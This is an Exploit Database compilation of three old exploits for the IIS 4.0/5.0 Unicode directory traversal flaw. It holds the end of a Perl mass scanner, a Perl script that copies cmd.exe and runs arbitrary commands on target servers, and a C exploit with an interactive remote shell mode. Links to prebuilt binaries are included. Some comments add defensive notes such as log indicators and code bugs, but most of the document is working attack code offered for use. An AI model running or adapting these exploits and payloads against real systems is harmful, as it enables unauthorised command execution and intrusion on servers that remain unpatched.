# sub connect, which exits.
foreach $script (@scripts) {
$submit = "GET /scripts/$script/winnt/system32/cmd.exe?/c+dir+$dir HTTP/1.0 \n\r\n\r";
$ouch = "/scripts/$script/winnt/system32/cmd.exe?/c+dir+$dir";
foreach $site (@target) {
unless(fork()) {
chop($site) if $site =~ /\n$/; &connect($site);
} # so i lied
}
}
sub connect { # real socket stuff
# Runs in a forked child: connect to $ste on the global $port, send the
# global $submit, read one reply line and log a hit when $code compares
# numerically equal to 200.  Always exits the child at the end.  The
# connect() call inside is presumably the builtin; callers reach this
# sub through the explicit &connect form.
my ($ste) = @_;
$iaddr = inet_aton($ste) || die "$ste might not be up, connecting to next site....\n";
$paddr = sockaddr_in($port, $iaddr);
$proto = getprotobyname('tcp');
# SIGALRM after $timeout seconds ends this child.  (&& binds tighter than
# the list operator print, so exit(0) is evaluated as part of print's
# argument list, before anything is written.)
local $SIG{ALRM} = sub { print "TimeOut On $ste, going to next one....\n" && exit(0) };
alarm $timeout;
socket(SCAN, PF_INET, SOCK_STREAM, $proto) || die("Error: couldn't make a socket to $ste");
connect(SCAN, $paddr) || die "Sorry couldn't connect to $ste, connecting to next site....\n";
send(SCAN, $submit, 0);
# Only the first line of the reply (the status line) is read.
$blackout = <SCAN>;
($http,$code,$blah) == split(/ /, $blackout);
# The verdict is a numeric comparison of $code with 200.
if ($code == "200") {
print "$ste has $ouch on there, go exploit it\n";
print LOG "$ste has $ouch on there\n";
}
else { print "$ste doesn't have it\n"; }
close(SCAN);
exit(0);
}
# Reached only by the parent; every child exits inside sub connect.
close(LOG);
# since we're done
exit;
# milw0rm.com [2000-11-18]
Exploit Database EDB-ID : 192
Publication date : 2000-11-17 23h00 +00:00
Author : Roelof Temmingh
EDB Verified : Yes
#!/usr/bin/perl
#
# See http://www.securityfocus.com/vdb/bottom.html?section=exploit&vid=1806
#
# Very simple PERL script to execute commands on IIS Unicode vulnerable servers
# Use port number with SSLproxy for testing SSL sites
# Usage: unicodexecute2 IP:port command
# Only makes use of "Socket" library
#
# New in version2:
# Copy the cmd.exe to something else, and then use it.
# The script checks for this.
# Thnx to
[email protected] for discovering the cmd.exe copy part
#
# Roelof Temmingh 2000/10/26
#
[email protected] http://www.sensepost.com
use Socket;
# --------------init
# Argument 0 is "IP:port", argument 1 the command to run.
if ($#ARGV<1) {die "Usage: unicodexecute IP:port command\n";}
($host,$port)=split(/:/,@ARGV[0]);
$target = inet_aton($host);
# --------------test if cmd has been copied:
# Step 1: run "dir" through the traversal URL and look for a copy of
# cmd.exe named sensepost.exe in the scripts directory listing.
$failed=1;
$command="dir";
@results=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /sensepost.exe/) {$failed=0;}
}
$failed2=1;
if ($failed==1) {
# Step 2: not there yet, so create it; the reply to "copy" is expected to
# contain "copied".  Spaces are sent as %20.  For defenders: an
# unexpected sensepost.exe in the scripts directory is a durable artefact
# of this tool having been run.
print "Sensepost.exe not found - Copying CMD...\n";
$command="copy c:\\winnt\\system32\\cmd.exe sensepost.exe";
$command=~s/ /\%20/g;
@results2=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0\r\n\r\n");
foreach $line2 (@results2){
if (($line2 =~ /copied/ )) {$failed2=0;}
}
if ($failed2==1) {die "Copy of CMD failed - inspect manually:\n@results2\n\n"};
}
# ------------ we can assume that the cmd.exe is copied from here..
# Step 3: run the user's command through the copied interpreter.  This
# request path (/inetpub/scripts/sensepost.exe) differs from the probe
# path above, so both patterns show up in the server log.
$command=@ARGV[1];
print "Sensepost.exe found - Executing [$command] on $host:$port\n";
$command=~s/ /\%20/g;
my @results=sendraw("GET /scripts/..%c0%af../inetpub/scripts/sensepost.exe?/c+$command HTTP/1.0\r\n\r\n");
print @results;
# ------------- Sendraw - thanx RFP
[email protected]
sub sendraw { # this saves the whole transaction anyway
# Send the raw request string $pstr over a fresh TCP connection to the
# globals $target/$port and return every reply line as a list.  Dies when
# the socket cannot be created or connected.
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
# The sockaddr is packed by hand: native short 2 (presumably AF_INET),
# network-order port, 4 address bytes, 8 bytes of padding.
if(connect(S,pack "SnA4x8",2,$port,$target)){
my @in;
# Make S the default output handle with autoflush on, write the request,
# collect the whole reply, then restore STDOUT before returning.
select(S); $|=1; print $pstr;
while(<S>){ push @in, $_;}
select(STDOUT); close(S); return @in;
} else { die("Can't connect...\n"); }
}
# Spidermark: sensepostdata
# milw0rm.com [2000-11-18]
Exploit Database EDB-ID : 190
Publication date : 2000-11-17 23h00 +00:00
Author : Optyx
EDB Verified : Yes
/****************************************************************************\
** **
** Microsoft IIS 4.0/5.0 Extended UNICODE Directory Traversal Exploit **
** proof of theory exploit cuz it's wednesday and i'm on the couch **
** **
** brought to you by the letter B, the number 7, optyx, and t12 **
** optyx - <
[email protected] [email protected]> **
** t12 - <
[email protected]> **
** **
** greetz go out to aempirei, a gun toatin' gangstah' hustler' player **
** motherfucker who isn't with us anymore, miah, who's GTA2 game was **
** was most entertaining tonight, Cathy, who provided the trippy light **
** to stare at, and to KT, for providing me with hours of decent **
** conversation. **
** **
\****************************************************************************/
#include <stdio.h>
#include <netdb.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <signal.h>
#include <errno.h>
#include <fcntl.h>
/*
 * Print the command-line synopsis to stderr and terminate with status -1.
 * Called from main() on any argument error.
 *
 * NOTE(review): the synopsis lists the timeout as "-t", but main()'s
 * option switch uses 't' for the target and reads the timeout under 'o'.
 */
void usage(void)
{
    static const char synopsis[] =
        "usage: ./iis-zank <-t target> <-c 'command' or -i>"
        " [-p port] [-t timeout]\n";

    fputs(synopsis, stderr);
    exit(-1);
}
int main(int argc, char **argv)
{
/*
 * Parse the command line, then send one traversal request per command and
 * echo the reply byte by byte.  In interactive mode (-i) commands are read
 * from stdin in a loop until "exit"; otherwise the single -c command is
 * sent once.
 *
 * Flag letters follow a '-' and take the NEXT argv element as their value:
 *   -t host   -c command   -p port   -o timeout   -i   -h
 * (usage() prints the timeout flag as -t; the switch below reads it as 'o'.)
 *
 * Reviewer notes, from a defensive reading of this listing:
 *  - argv[i+1] is used without checking that it exists, so a value-taking
 *    flag given as the last argument dereferences argv[argc] (NULL).
 *  - strncpy() with the full destination size leaves no terminator when the
 *    argument is at least that long.
 *  - no SIGALRM handler is installed here (signal.h is included but signal()
 *    is never called), so an expired alarm() gets the default action, which
 *    terminates the process instead of reporting a timeout.
 *  - close() and alarm() are used without <unistd.h>; they are implicitly
 *    declared.
 *  - each pass of the loop opens a new socket and close(i) sits after the
 *    loop, so interactive mode leaks one descriptor per command.
 *  - the request line carries "..%c0%af../winnt/system32/cmd.exe" in clear;
 *    that substring is the thing to alert on in web server logs and IDS rules.
 */
int i, j;             /* i doubles as loop index and, later, socket descriptor */
int port=80;
int timeout=3;
int interactive=0;
char temp[1];         /* one-byte receive buffer for the echo loop */
char host[512]="";
char cmd[1024]="";
char request[8192]="GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+";
struct hostent *he;
struct sockaddr_in s_addr;
printf("iis-zank_bread_chafer_8000_super_alpha_hyper_pickle.c\n");
printf("by optyx and t12\n");
/* Scan every argv element (argv[0] included) for '-'-prefixed flag groups. */
for(i=0;i<argc;i++)
{ if(argv[i][0] == '-') {
/* int j is compared against size_t strlen(): a signed/unsigned comparison. */
for(j=1;j<strlen(argv[i]);j++)
{
switch(argv[i][j])
{
case 't':
strncpy(host, argv[i+1], sizeof(host));
break;
case 'c':
strncpy(cmd, argv[i+1], sizeof(cmd));
break;
case 'h':
usage();
break;
case 'o':
timeout=atoi(argv[i+1]);
break;
case 'p':
port=atoi(argv[i+1]);
break;
case 'i':
interactive=1;
break;
default:
break;
}
}
}
}
if(!strcmp(host, ""))
{
fprintf(stderr, "specify target host\n");
usage();
}
if(!strcmp(cmd, "") && !interactive)
{
fprintf(stderr, "specify command to execute\n");
usage();
}
printf("]- Target - %s:%d\n", host, port);
if(!interactive)
printf("]- Command - %s\n", cmd);
printf("]- Timeout - %d seconds\n", timeout);
/* Resolved once before the loop; the address is copied into s_addr each pass. */
if((he=gethostbyname(host)) == NULL)
{
fprintf(stderr, "invalid target\n");
usage();
}
do
{
if(interactive)
{
cmd[0]=0;
printf("\nC> ");
/* The message says gets(), but fgets() is what is called. */
if(fgets(cmd, sizeof(cmd), stdin) == NULL)
fprintf(stderr, "gets() error\n");
/* Strips the trailing newline; with an empty cmd (e.g. after EOF) this
 * indexes cmd[-1]. */
cmd[strlen(cmd)-1]='\0';
if(!strcmp("exit", cmd))
exit(-1);
}
/* Spaces become '+' so the command survives as a query string. */
for(i=0;i<strlen(cmd);i++)
{
if(cmd[i]==' ')
cmd[i]='+';
}
/* The request is rebuilt from scratch on every pass.  A strncat bound of
 * sizeof(request) - strlen(request) allows one byte more than the space
 * left for the terminator. */
strncpy(request,
"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+",
sizeof(request));
strncat(request, cmd, sizeof(request) - strlen(request));
strncat(request, "\n", sizeof(request) - strlen(request));
/* PF_INET is used where AF_INET is expected; s_addr is otherwise left unzeroed. */
s_addr.sin_family = PF_INET;
s_addr.sin_port = htons(port);
memcpy((char *) &s_addr.sin_addr, (char *) he->h_addr,
sizeof(s_addr.sin_addr));
if((i=socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
{
fprintf(stderr, "cannot create socket\n");
exit(-1);
}
/* Bounds the connect() with the alarm; see the note on SIGALRM above. */
alarm(timeout);
j = connect(i, (struct sockaddr *) &s_addr, sizeof(s_addr));
alarm(0);
if(j==-1)
{
fprintf(stderr, "cannot connect to %s\n", host);
exit(-1);
close(i);   /* unreachable: exit() precedes it */
}
if(!interactive)
printf("]- Sending request: %s\n", request);
send(i, request, strlen(request), 0);
if(!interactive)
printf("]- Getting results\n");
/* Echo the reply one byte at a time.  The alarm is armed around printf(),
 * not around the blocking recv(). */
while(recv(i,temp,1, 0)>0)
{
alarm(timeout);
printf("%c", temp[0]);
alarm(0);
}
}
while(interactive);
close(i);
return 0;
}
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/190-1.exe
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/190-2.obsd
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/190-3.linux
// milw0rm.com [2000-11-18]
Products Mentioned
Configuration 0
Microsoft>>Internet_information_server >> Version 4.0
Microsoft>>Internet_information_services >> Version 5.0
References